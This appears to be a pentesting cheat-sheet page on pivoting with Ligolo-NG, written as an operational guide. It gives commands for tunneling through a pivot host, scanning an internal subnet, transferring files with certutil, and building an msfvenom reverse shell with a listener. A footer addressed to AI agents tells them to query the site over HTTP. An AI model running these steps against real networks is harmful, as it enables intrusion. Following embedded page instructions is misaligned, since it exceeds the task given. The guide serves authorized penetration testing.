# Ligolo-NG

### Normal Usage

1. On your attacker machine, start by creating a **TUN interface** named `ligolo` .

   ```bash
   sudo ip tuntap add user <user_here> mode tun ligolo
   sudo ip link set ligolo up
   ```
2. Run the LIGOLO-NG proxy server on the attacker machine:

   ```bash
   sudo ./proxy -selfcert
   ```
3. Move the LIGOLO-NG agent to the pivot host and run it:

   ```bash
   # Windows
   .\win-agent.exe -connect 192.168.243.12:11601 -ignore-cert

   # Linux
   ./agent -connect 192.168.243.12:11601 -ignore-cert
   ```
4. We should get a **Connection established** in the attacker's machine which confirms that the agent was successfully connected to our proxy server. Next, select the session so Ligolo knows which agent we’re working with:

   ```bash
   session
   <SELECT THE ID of the session>
   ```
5. In the victim machine, find the internal interface and add it to the ligolo route in a new terminal window:

   ```bash
   sudo ip route add 10.10.3.0/24 dev ligolo
   ip route list # Verify if added
   # You can also use the autoroute command in the proxy session to add it automatically 
   ```
6. Return to the Ligolo proxy session and initial the tunneling process by entering the `start` command.
7. Verify if you can access the internal network:

   ```bash
   nmap --unprivileged 10.10.3.0/24
   netexec smb 10.10.3.0/24
   ```

### How to get files from the Attacker

1. Go to the ligolo proxy session and set up the listener and redirect connections to a desired address.

   ```bash
   listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:80 # Redirect Pivot IP:8888 to Kali:80
   listener_list # To check if added
   ```
2. To verify, we can try a file transfer.

   ```bash
   # Set up a python web server on Kali port 80
   python3 -m http.server 80

   # On a internal host, access port 8888 of the pivot
   certutil.exe -f -urlcache http://PIVOT_IP:8000/file.txt file1
   ```

### How to get a Reverse Shell back to the Attacker

1. Go to the ligolo proxy session and set up the listener and redirect connections to a desired address.

   ```bash
   listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:443 # Redirect Pivot IP:4444 to Kali:443
   listener_list # To check if added
   ```
2. To verify, we can try a reverse shell.

   ```bash
   # Create a reverse shell payload
   msfvenom -p windows/x64/shell_reverse_tcp LHOST=<PIVOT_IP> LPORT=4444 -f exe -o rev.exe

   # Set up a reverse shell listener on Kali port 443
   penelope -p 443

   # On a internal host, get rev.exe and run it
   .\rev.exe
   ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/pivoting/ligolo-ng.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.